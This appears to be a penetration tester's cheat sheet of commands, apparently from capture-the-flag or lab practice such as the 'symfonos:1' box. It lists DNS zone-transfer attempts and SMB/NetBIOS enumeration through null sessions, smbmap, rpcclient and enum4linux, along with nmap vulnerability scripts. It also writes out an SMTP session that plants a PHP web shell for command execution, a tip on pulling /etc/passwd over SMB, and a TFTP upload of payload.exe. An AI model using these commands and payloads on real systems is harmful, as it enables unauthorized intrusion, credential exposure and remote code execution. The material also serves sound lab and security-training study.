ls -l /usr/share/nmap/scripts/*vuln*
dig <target domain> @<dns server> axfr
host -l <target domain> <dns server>
dig @[DNS SERVER HERE] axfr [DOMAIN NAME HERE]
nmblookup -A $ip
smbmap -H $ip
echo exit | smbclient -L \\\\$ip
nmap --script smb-enum-shares -p 139,445 $ip
smbmap -H $ip
rpcclient -U "" -N $ip
smbclient \\\\$ip\\[share name]
nmap --script smb-vuln* -p 139,445 $ip
enum4linux -a $ip
smbver.sh $ip (port)
nmap -p 139,445 --open -oG smb.txt 192.168.1.0/24
nbtscan -r 192.168.1.0/24
rpcclient: to automate enumerating an SMB server. Produces tons of results when a null session is successful. NOTE: Make sure to downgrade rpcclient before using.
/usr/share/smbmap directory
get: command to download absolute-path files from the remote system. E.g. get /etc/passwd will download the passwd file and overwrite YOUR /etc/passwd. Use get /etc/passwd /tmp/passwd instead.
smbclient, rpcclient, net and nmblookup
telnet $ip 25
EHLO rowbot
MAIL FROM:[email protected]
RCPT TO:$usernamehere
DATA
Subject: shell
<?php system($_GET['cmd']); ?>
.
quit
symfonos:1 box
connecting/interacting:
tftp $ip
tftp> put payload.exe
tftp> get file.txt